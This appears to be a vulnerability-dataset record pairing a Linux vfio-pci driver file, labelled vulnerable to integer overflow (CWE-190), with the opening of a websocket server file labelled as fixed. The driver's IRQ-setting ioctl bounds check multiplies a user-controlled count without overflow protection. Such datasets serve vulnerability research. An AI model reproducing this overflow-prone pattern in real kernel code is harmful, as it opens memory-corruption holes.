.fn = fn, .data = data, .pdev = pdev, .slot = slot, .ret = 0,
};
pci_walk_bus(pdev->bus, vfio_pci_walk_wrapper, &walk);
return walk.ret;
}
static int msix_sparse_mmap_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_sparse_mmap *sparse;
size_t end, size;
int nr_areas = 2, i = 0;
end = pci_resource_len(vdev->pdev, vdev->msix_bar);
/* If MSI-X table is aligned to the start or end, only one area */
if (((vdev->msix_offset & PAGE_MASK) == 0) ||
(PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) >= end))
nr_areas = 1;
size = sizeof(*sparse) + (nr_areas * sizeof(*sparse->areas));
header = vfio_info_cap_add(caps, size,
VFIO_REGION_INFO_CAP_SPARSE_MMAP, 1);
if (IS_ERR(header))
return PTR_ERR(header);
sparse = container_of(header,
struct vfio_region_info_cap_sparse_mmap, header);
sparse->nr_areas = nr_areas;
if (vdev->msix_offset & PAGE_MASK) {
sparse->areas[i].offset = 0;
sparse->areas[i].size = vdev->msix_offset & PAGE_MASK;
i++;
}
if (PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) < end) {
sparse->areas[i].offset = PAGE_ALIGN(vdev->msix_offset +
vdev->msix_size);
sparse->areas[i].size = end - sparse->areas[i].offset;
i++;
}
return 0;
}
static int region_type_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps,
unsigned int type, unsigned int subtype)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_type *cap;
header = vfio_info_cap_add(caps, sizeof(*cap),
VFIO_REGION_INFO_CAP_TYPE, 1);
if (IS_ERR(header))
return PTR_ERR(header);
cap = container_of(header, struct vfio_region_info_cap_type, header);
cap->type = type;
cap->subtype = subtype;
return 0;
}
int vfio_pci_register_dev_region(struct vfio_pci_device *vdev,
unsigned int type, unsigned int subtype,
const struct vfio_pci_regops *ops,
size_t size, u32 flags, void *data)
{
struct vfio_pci_region *region;
region = krealloc(vdev->region,
(vdev->num_regions + 1) * sizeof(*region),
GFP_KERNEL);
if (!region)
return -ENOMEM;
vdev->region = region;
vdev->region[vdev->num_regions].type = type;
vdev->region[vdev->num_regions].subtype = subtype;
vdev->region[vdev->num_regions].ops = ops;
vdev->region[vdev->num_regions].size = size;
vdev->region[vdev->num_regions].flags = flags;
vdev->region[vdev->num_regions].data = data;
vdev->num_regions++;
return 0;
}
static long vfio_pci_ioctl(void *device_data,
unsigned int cmd, unsigned long arg)
{
struct vfio_pci_device *vdev = device_data;
unsigned long minsz;
if (cmd == VFIO_DEVICE_GET_INFO) {
struct vfio_device_info info;
minsz = offsetofend(struct vfio_device_info, num_irqs);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
info.flags = VFIO_DEVICE_FLAGS_PCI;
if (vdev->reset_works)
info.flags |= VFIO_DEVICE_FLAGS_RESET;
info.num_regions = VFIO_PCI_NUM_REGIONS + vdev->num_regions;
info.num_irqs = VFIO_PCI_NUM_IRQS;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_REGION_INFO) {
struct pci_dev *pdev = vdev->pdev;
struct vfio_region_info info;
struct vfio_info_cap caps = { .buf = NULL, .size = 0 };
int i, ret;
minsz = offsetofend(struct vfio_region_info, offset);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pdev->cfg_size;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
info.flags = 0;
break;
}
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
if (vdev->bar_mmap_supported[info.index]) {
info.flags |= VFIO_REGION_INFO_FLAG_MMAP;
if (info.index == vdev->msix_bar) {
ret = msix_sparse_mmap_cap(vdev, &caps);
if (ret)
return ret;
}
}
break;
case VFIO_PCI_ROM_REGION_INDEX:
{
void __iomem *io;
size_t size;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.flags = 0;
/* Report the BAR size, not the ROM size */
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
/* Shadow ROMs appear as PCI option ROMs */
if (pdev->resource[PCI_ROM_RESOURCE].flags &
IORESOURCE_ROM_SHADOW)
info.size = 0x20000;
else
break;
}
/* Is it really there? */
io = pci_map_rom(pdev, &size);
if (!io || !size) {
info.size = 0;
break;
}
pci_unmap_rom(pdev, io);
info.flags = VFIO_REGION_INFO_FLAG_READ;
break;
}
case VFIO_PCI_VGA_REGION_INDEX:
if (!vdev->has_vga)
return -EINVAL;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = 0xc0000;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
default:
if (info.index >=
VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
i = info.index - VFIO_PCI_NUM_REGIONS;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = vdev->region[i].size;
info.flags = vdev->region[i].flags;
ret = region_type_cap(vdev, &caps,
vdev->region[i].type,
vdev->region[i].subtype);
if (ret)
return ret;
}
if (caps.size) {
info.flags |= VFIO_REGION_INFO_FLAG_CAPS;
if (info.argsz < sizeof(info) + caps.size) {
info.argsz = sizeof(info) + caps.size;
info.cap_offset = 0;
} else {
vfio_info_cap_shift(&caps, sizeof(info));
if (copy_to_user((void __user *)arg +
sizeof(info), caps.buf,
caps.size)) {
kfree(caps.buf);
return -EFAULT;
}
info.cap_offset = sizeof(info);
}
kfree(caps.buf);
}
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_IRQ_INFO) {
struct vfio_irq_info info;
minsz = offsetofend(struct vfio_irq_info, count);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz || info.index >= VFIO_PCI_NUM_IRQS)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_INTX_IRQ_INDEX ... VFIO_PCI_MSIX_IRQ_INDEX:
case VFIO_PCI_REQ_IRQ_INDEX:
break;
case VFIO_PCI_ERR_IRQ_INDEX:
if (pci_is_pcie(vdev->pdev))
break;
/* pass thru to return error */
default:
return -EINVAL;
}
info.flags = VFIO_IRQ_INFO_EVENTFD;
info.count = vfio_pci_get_irq_count(vdev, info.index);
if (info.index == VFIO_PCI_INTX_IRQ_INDEX)
info.flags |= (VFIO_IRQ_INFO_MASKABLE |
VFIO_IRQ_INFO_AUTOMASKED);
else
info.flags |= VFIO_IRQ_INFO_NORESIZE;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_SET_IRQS) {
struct vfio_irq_set hdr;
u8 *data = NULL;
int ret = 0;
minsz = offsetofend(struct vfio_irq_set, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.index >= VFIO_PCI_NUM_IRQS ||
hdr.flags & ~(VFIO_IRQ_SET_DATA_TYPE_MASK |
VFIO_IRQ_SET_ACTION_TYPE_MASK))
return -EINVAL;
if (!(hdr.flags & VFIO_IRQ_SET_DATA_NONE)) {
size_t size;
int max = vfio_pci_get_irq_count(vdev, hdr.index);
if (hdr.flags & VFIO_IRQ_SET_DATA_BOOL)
size = sizeof(uint8_t);
else if (hdr.flags & VFIO_IRQ_SET_DATA_EVENTFD)
size = sizeof(int32_t);
else
return -EINVAL;
if (hdr.argsz - minsz < hdr.count * size ||
hdr.start >= max || hdr.start + hdr.count > max)
return -EINVAL;
data = memdup_user((void __user *)(arg + minsz),
hdr.count * size);
if (IS_ERR(data))
return PTR_ERR(data);
}
mutex_lock(&vdev->igate);
ret = vfio_pci_set_irqs_ioctl(vdev, hdr.flags, hdr.index,
hdr.start, hdr.count, data);
mutex_unlock(&vdev->igate);
kfree(data);
return ret;
} else if (cmd == VFIO_DEVICE_RESET) {
return vdev->reset_works ?
pci_try_reset_function(vdev->pdev) : -EINVAL;
} else if (cmd == VFIO_DEVICE_GET_PCI_HOT_RESET_INFO) {
struct vfio_pci_hot_reset_info hdr;
struct vfio_pci_fill_info fill = { 0 };
struct vfio_pci_dependent_device *devices = NULL;
bool slot = false;
int ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset_info, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz)
return -EINVAL;
hdr.flags = 0;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/* How many devices are affected? */
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&fill.max, slot);
if (ret)
return ret;
WARN_ON(!fill.max); /* Should always be at least one */
/*
* If there's enough space, fill it now, otherwise return
* -ENOSPC and the number of devices affected.
*/
if (hdr.argsz < sizeof(hdr) + (fill.max * sizeof(*devices))) {
ret = -ENOSPC;
hdr.count = fill.max;
goto reset_info_exit;
}
devices = kcalloc(fill.max, sizeof(*devices), GFP_KERNEL);
if (!devices)
return -ENOMEM;
fill.devices = devices;
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_fill_devs,
&fill, slot);
/*
* If a device was removed between counting and filling,
* we may come up short of fill.max. If a device was
* added, we'll have a return of -EAGAIN above.
*/
if (!ret)
hdr.count = fill.cur;
reset_info_exit:
if (copy_to_user((void __user *)arg, &hdr, minsz))
ret = -EFAULT;
if (!ret) {
if (copy_to_user((void __user *)(arg + minsz), devices,
hdr.count * sizeof(*devices)))
ret = -EFAULT;
}
kfree(devices);
return ret;
} else if (cmd == VFIO_DEVICE_PCI_HOT_RESET) {
struct vfio_pci_hot_reset hdr;
int32_t *group_fds;
struct vfio_pci_group_entry *groups;
struct vfio_pci_group_info info;
bool slot = false;
int i, count = 0, ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.flags)
return -EINVAL;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/*
* We can't let userspace give us an arbitrarily large
* buffer to copy, so verify how many we think there
* could be. Note groups can have multiple devices so
* one group per device is the max.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&count, slot);
if (ret)
return ret;
/* Somewhere between 1 and count is OK */
if (!hdr.count || hdr.count > count)
return -EINVAL;
group_fds = kcalloc(hdr.count, sizeof(*group_fds), GFP_KERNEL);
groups = kcalloc(hdr.count, sizeof(*groups), GFP_KERNEL);
if (!group_fds || !groups) {
kfree(group_fds);
kfree(groups);
return -ENOMEM;
}
if (copy_from_user(group_fds, (void __user *)(arg + minsz),
hdr.count * sizeof(*group_fds))) {
kfree(group_fds);
kfree(groups);
return -EFAULT;
}
/*
* For each group_fd, get the group through the vfio external
* user interface and store the group and iommu ID. This
* ensures the group is held across the reset.
*/
for (i = 0; i < hdr.count; i++) {
struct vfio_group *group;
struct fd f = fdget(group_fds[i]);
if (!f.file) {
ret = -EBADF;
break;
}
group = vfio_group_get_external_user(f.file);
fdput(f);
if (IS_ERR(group)) {
ret = PTR_ERR(group);
break;
}
groups[i].group = group;
groups[i].id = vfio_external_user_iommu_id(group);
}
kfree(group_fds);
/* release reference to groups on error */
if (ret)
goto hot_reset_release;
info.count = hdr.count;
info.groups = groups;
/*
* Test whether all the affected devices are contained
* by the set of groups provided by the user.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_validate_devs,
&info, slot);
if (!ret)
/* User has access, do the reset */
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
hot_reset_release:
for (i--; i >= 0; i--)
vfio_group_put_external_user(groups[i].group);
kfree(groups);
return ret;
}
return -ENOTTY;
}
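/*
 * Illustrative userspace sketch (editorial addition, not part of this
 * driver): VFIO_DEVICE_GET_PCI_HOT_RESET_INFO above is meant to be issued
 * twice -- once with only the header so the kernel reports the number of
 * affected devices (it returns -ENOSPC but still copies back count), and
 * again with a buffer sized for that count. Guarded out with #if 0 because
 * it is userspace code; "device_fd" is a hypothetical, already-open vfio
 * device file descriptor and the struct layout is assumed to follow
 * <linux/vfio.h>.
 */
#if 0
#include <stdlib.h>
#include <sys/ioctl.h>
#include <linux/vfio.h>

static int example_query_hot_reset_info(int device_fd)
{
	struct vfio_pci_hot_reset_info probe = { .argsz = sizeof(probe) };
	struct vfio_pci_hot_reset_info *info;
	size_t sz;

	/* First pass: header only; the kernel fails with ENOSPC but still
	 * copies back the required device count. */
	ioctl(device_fd, VFIO_DEVICE_GET_PCI_HOT_RESET_INFO, &probe);
	if (!probe.count)
		return -1;

	sz = sizeof(*info) +
	     probe.count * sizeof(struct vfio_pci_dependent_device);
	info = calloc(1, sz);
	if (!info)
		return -1;
	info->argsz = sz;

	/* Second pass: argsz is now large enough, devices[] gets filled. */
	if (ioctl(device_fd, VFIO_DEVICE_GET_PCI_HOT_RESET_INFO, info)) {
		free(info);
		return -1;
	}
	/* info->devices[0 .. info->count - 1] describe the affected devices. */
	free(info);
	return 0;
}
#endif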
static ssize_t vfio_pci_rw(void *device_data, char __user *buf,
size_t count, loff_t *ppos, bool iswrite)
{
unsigned int index = VFIO_PCI_OFFSET_TO_INDEX(*ppos);
struct vfio_pci_device *vdev = device_data;
if (index >= VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
switch (index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
return vfio_pci_config_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_ROM_REGION_INDEX:
if (iswrite)
return -EINVAL;
return vfio_pci_bar_rw(vdev, buf, count, ppos, false);
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
return vfio_pci_bar_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_VGA_REGION_INDEX:
return vfio_pci_vga_rw(vdev, buf, count, ppos, iswrite);
default:
index -= VFIO_PCI_NUM_REGIONS;
return vdev->region[index].ops->rw(vdev, buf,
count, ppos, iswrite);
}
return -EINVAL;
}
static ssize_t vfio_pci_read(void *device_data, char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, buf, count, ppos, false);
}
static ssize_t vfio_pci_write(void *device_data, const char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, (char __user *)buf, count, ppos, true);
}
static int vfio_pci_mmap(void *device_data, struct vm_area_struct *vma)
{
struct vfio_pci_device *vdev = device_data;
struct pci_dev *pdev = vdev->pdev;
unsigned int index;
u64 phys_len, req_len, pgoff, req_start;
int ret;
index = vma->vm_pgoff >> (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT);
if (vma->vm_end < vma->vm_start)
return -EINVAL;
if ((vma->vm_flags & VM_SHARED) == 0)
return -EINVAL;
if (index >= VFIO_PCI_ROM_REGION_INDEX)
return -EINVAL;
if (!vdev->bar_mmap_supported[index])
return -EINVAL;
phys_len = PAGE_ALIGN(pci_resource_len(pdev, index));
req_len = vma->vm_end - vma->vm_start;
pgoff = vma->vm_pgoff &
((1U << (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT)) - 1);
req_start = pgoff << PAGE_SHIFT;
if (req_start + req_len > phys_len)
return -EINVAL;
if (index == vdev->msix_bar) {
/*
* Disallow mmaps overlapping the MSI-X table; users don't
* get to touch this directly. We could find somewhere
* else to map the overlap, but page granularity is only
* a recommendation, not a requirement, so the user needs
* to know which bits are real. Requiring them to mmap
* around the table makes that clear.
*/
/* If neither entirely above nor below, then it overlaps */
if (!(req_start >= vdev->msix_offset + vdev->msix_size ||
req_start + req_len <= vdev->msix_offset))
return -EINVAL;
}
/*
* Even though we don't make use of the barmap for the mmap,
* we need to request the region and the barmap tracks that.
*/
if (!vdev->barmap[index]) {
ret = pci_request_selected_regions(pdev,
1 << index, "vfio-pci");
if (ret)
return ret;
vdev->barmap[index] = pci_iomap(pdev, index, 0);
}
vma->vm_private_data = vdev;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
vma->vm_pgoff = (pci_resource_start(pdev, index) >> PAGE_SHIFT) + pgoff;
return remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
req_len, vma->vm_page_prot);
}
static void vfio_pci_request(void *device_data, unsigned int count)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&vdev->igate);
if (vdev->req_trigger) {
if (!(count % 10))
dev_notice_ratelimited(&vdev->pdev->dev,
"Relaying device request to user (#%u)\n",
count);
eventfd_signal(vdev->req_trigger, 1);
} else if (count == 0) {
dev_warn(&vdev->pdev->dev,
"No device request channel registered, blocked until released by user\n");
}
mutex_unlock(&vdev->igate);
}
static const struct vfio_device_ops vfio_pci_ops = {
.name = "vfio-pci",
.open = vfio_pci_open,
.release = vfio_pci_release,
.ioctl = vfio_pci_ioctl,
.read = vfio_pci_read,
.write = vfio_pci_write,
.mmap = vfio_pci_mmap,
.request = vfio_pci_request,
};
static int vfio_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
{
struct vfio_pci_device *vdev;
struct iommu_group *group;
int ret;
if (pdev->hdr_type != PCI_HEADER_TYPE_NORMAL)
return -EINVAL;
group = vfio_iommu_group_get(&pdev->dev);
if (!group)
return -EINVAL;
vdev = kzalloc(sizeof(*vdev), GFP_KERNEL);
if (!vdev) {
vfio_iommu_group_put(group, &pdev->dev);
return -ENOMEM;
}
vdev->pdev = pdev;
vdev->irq_type = VFIO_PCI_NUM_IRQS;
mutex_init(&vdev->igate);
spin_lock_init(&vdev->irqlock);
ret = vfio_add_group_dev(&pdev->dev, &vfio_pci_ops, vdev);
if (ret) {
vfio_iommu_group_put(group, &pdev->dev);
kfree(vdev);
return ret;
}
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, vdev, NULL, vfio_pci_set_vga_decode);
vga_set_legacy_decoding(pdev,
vfio_pci_set_vga_decode(vdev, false));
}
if (!disable_idle_d3) {
/*
* pci-core sets the device power state to an unknown value at
* bootup and after being removed from a driver. The only
* transition it allows from this unknown state is to D0, which
* typically happens when a driver calls pci_enable_device().
* We're not ready to enable the device yet, but we do want to
* be able to get to D3. Therefore first do a D0 transition
* before going to D3.
*/
pci_set_power_state(pdev, PCI_D0);
pci_set_power_state(pdev, PCI_D3hot);
}
return ret;
}
static void vfio_pci_remove(struct pci_dev *pdev)
{
struct vfio_pci_device *vdev;
vdev = vfio_del_group_dev(&pdev->dev);
if (!vdev)
return;
vfio_iommu_group_put(pdev->dev.iommu_group, &pdev->dev);
kfree(vdev->region);
kfree(vdev);
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, NULL, NULL, NULL);
vga_set_legacy_decoding(pdev,
VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM);
}
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D0);
}
static pci_ers_result_t vfio_pci_aer_err_detected(struct pci_dev *pdev,
pci_channel_state_t state)
{
struct vfio_pci_device *vdev;
struct vfio_device *device;
device = vfio_device_get_from_dev(&pdev->dev);
if (device == NULL)
return PCI_ERS_RESULT_DISCONNECT;
vdev = vfio_device_data(device);
if (vdev == NULL) {
vfio_device_put(device);
return PCI_ERS_RESULT_DISCONNECT;
}
mutex_lock(&vdev->igate);
if (vdev->err_trigger)
eventfd_signal(vdev->err_trigger, 1);
mutex_unlock(&vdev->igate);
vfio_device_put(device);
return PCI_ERS_RESULT_CAN_RECOVER;
}
static const struct pci_error_handlers vfio_err_handlers = {
.error_detected = vfio_pci_aer_err_detected,
};
static struct pci_driver vfio_pci_driver = {
.name = "vfio-pci",
.id_table = NULL, /* only dynamic ids */
.probe = vfio_pci_probe,
.remove = vfio_pci_remove,
.err_handler = &vfio_err_handlers,
};
struct vfio_devices {
struct vfio_device **devices;
int cur_index;
int max_index;
};
static int vfio_pci_get_devs(struct pci_dev *pdev, void *data)
{
struct vfio_devices *devs = data;
struct vfio_device *device;
if (devs->cur_index == devs->max_index)
return -ENOSPC;
device = vfio_device_get_from_dev(&pdev->dev);
if (!device)
return -EINVAL;
if (pci_dev_driver(pdev) != &vfio_pci_driver) {
vfio_device_put(device);
return -EBUSY;
}
devs->devices[devs->cur_index++] = device;
return 0;
}
/*
* Attempt to do a bus/slot reset if there are devices affected by a reset for
* this device that have needs_reset set and all of the affected devices are unused
* (!refcnt). Callers are required to hold driver_lock when calling this to
* prevent device opens and concurrent bus reset attempts. We prevent device
* unbinds by acquiring and holding a reference to the vfio_device.
*
* NB: vfio-core considers a group to be viable even if some devices are
* bound to drivers like pci-stub or pcieport. Here we require all devices
* to be bound to vfio_pci since that's the only way we can be sure they
* stay put.
*/
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev)
{
struct vfio_devices devs = { .cur_index = 0 };
int i = 0, ret = -EINVAL;
bool needs_reset = false, slot = false;
struct vfio_pci_device *tmp;
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev, vfio_pci_count_devs,
&i, slot) || !i)
return;
devs.max_index = i;
devs.devices = kcalloc(i, sizeof(struct vfio_device *), GFP_KERNEL);
if (!devs.devices)
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_get_devs, &devs, slot))
goto put_devs;
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (tmp->needs_reset)
needs_reset = true;
if (tmp->refcnt)
goto put_devs;
}
if (needs_reset)
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
put_devs:
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (!ret)
tmp->needs_reset = false;
if (!tmp->refcnt && !disable_idle_d3)
pci_set_power_state(tmp->pdev, PCI_D3hot);
vfio_device_put(devs.devices[i]);
}
kfree(devs.devices);
}
static void __exit vfio_pci_cleanup(void)
{
pci_unregister_driver(&vfio_pci_driver);
vfio_pci_uninit_perm_bits();
}
static void __init vfio_pci_fill_ids(void)
{
char *p, *id;
int rc;
/* no ids passed actually */
if (ids[0] == '\0')
return;
/* add ids specified in the module parameter */
p = ids;
while ((id = strsep(&p, ","))) {
unsigned int vendor, device, subvendor = PCI_ANY_ID,
subdevice = PCI_ANY_ID, class = 0, class_mask = 0;
int fields;
if (!strlen(id))
continue;
fields = sscanf(id, "%x:%x:%x:%x:%x:%x",
&vendor, &device, &subvendor, &subdevice,
&class, &class_mask);
if (fields < 2) {
pr_warn("invalid id string \"%s\"\n", id);
continue;
}
rc = pci_add_dynid(&vfio_pci_driver, vendor, device,
subvendor, subdevice, class, class_mask, 0);
if (rc)
pr_warn("failed to add dynamic id [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x (%d)\n",
vendor, device, subvendor, subdevice,
class, class_mask, rc);
else
pr_info("add [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x\n",
vendor, device, subvendor, subdevice,
class, class_mask);
}
}
static int __init vfio_pci_init(void)
{
int ret;
/* Allocate shared config space permission data used by all devices */
ret = vfio_pci_init_perm_bits();
if (ret)
return ret;
/* Register and scan for devices */
ret = pci_register_driver(&vfio_pci_driver);
if (ret)
goto out_driver;
vfio_pci_fill_ids();
return 0;
out_driver:
vfio_pci_uninit_perm_bits();
return ret;
}
module_init(vfio_pci_init);
module_exit(vfio_pci_cleanup);
MODULE_VERSION(DRIVER_VERSION);
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5375_0 |
crossvul-cpp_data_good_401_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
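/*
 * Editorial note: the check above is a suffix match. For example, an Origin
 * header of "https://app.example.com" is accepted when the configured origin
 * is "example.com", because the required string only has to terminate the
 * received one.
 */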
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL || strlen(connection) > UT_WS_SVR_MAX_HEADER_SIZE)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
